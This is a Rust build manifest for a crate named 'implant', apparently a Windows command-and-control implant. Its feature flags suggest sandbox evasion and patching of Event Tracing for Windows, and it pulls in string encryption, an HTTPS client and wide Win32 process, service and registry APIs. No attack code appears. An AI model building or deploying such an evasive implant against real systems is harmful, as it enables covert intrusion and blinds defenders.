[package]
name = "implant"
version = "0.1.0"
edition = "2024"
build = "build.rs"

[profile.release]
opt-level = "z"
codegen-units = 1
lto = "fat"
strip = "symbols"
panic = "abort"
debug = 0
split-debuginfo = "off"

[[bin]]
name = "implant"
path = "src/main.rs"

[[bin]]
name = "implant_svc"
path = "src/main_svc.rs"

[lib]
name = "implant"
path = "src/lib.rs"
crate-type = ["cdylib"]

[features]
sandbox_trig = []
sandbox_mem = []
patch_etw = []

[dependencies]
minreq = { version="2.13", features = [
    "https-rustls-probe",
    "json-using-serde",
]}
shared ={ path = "../shared" }
serde = {version = "1.0", features = ["derive"] }
serde_json = "1"
str_crypter = "1.0.3"
cgmath = "0.18.0"
windows-sys = {version = "0.61", features = [
    "Win32",
    "Win32_Foundation",
    "Win32_NetworkManagement_NetManagement",
    "Win32_Storage_FileSystem",
    "Win32_System_ProcessStatus",
    "Win32_System_SystemInformation",
    "Win32_System_Threading",
    "Win32_System_WindowsProgramming",
    "Win32_System_SystemServices",
    "Win32_Security",
    "Win32_UI_WindowsAndMessaging",
    "Win32_System_Diagnostics_Debug",
    "Win32_System_Services",
    "Win32_System_Diagnostics_ToolHelp",
    "Win32_System_Ole",
    "Win32_System_Variant",
]}
rand = "0.9"
windows-registry = "0.6"
chrono = { version = "0.4", features = ["serde"] }